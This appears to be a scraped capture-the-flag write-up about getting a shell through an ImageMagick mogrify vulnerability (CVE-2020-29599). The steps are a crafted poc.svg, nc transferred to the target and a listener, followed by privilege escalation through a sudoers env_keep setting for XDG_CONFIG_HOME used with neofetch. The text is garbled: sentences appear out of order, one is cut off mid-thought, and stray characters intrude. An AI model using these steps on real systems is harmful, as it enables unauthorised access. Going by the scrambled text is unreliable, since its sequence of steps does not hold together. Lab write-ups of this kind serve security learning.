So, here is my thought process: I can define this environment variable ( XDG_CONFIG_HOME) and point to thomas’. In the Github page of neofetch, we can see that this env value is set to “$”. That value is set to XDG_CONFIG_HOME in the sudoers file. This is added to preserve the environment variables while running as different users. Start the listener on the port mentioned while creating the svg and wait …īut there is an interesting field that is added in the sudoers file and that is env_keep. Copy both the files, poc.svg and nc to the location mentioned in the bash file. Now, to get the shell as another user, we have to copy this svg file to the location where that user is actually running the mogrify tool from. Maybe issues with my payload) as well to the remote system.
To exploit this, I created a poc.svg file and transferred that along with nc (other methods were not working for me. A great blog post to understand the vulnerability and how to exploit it. Found the CVE-2020–29599 for this version and from there got this blog.
0 kommentar(er)
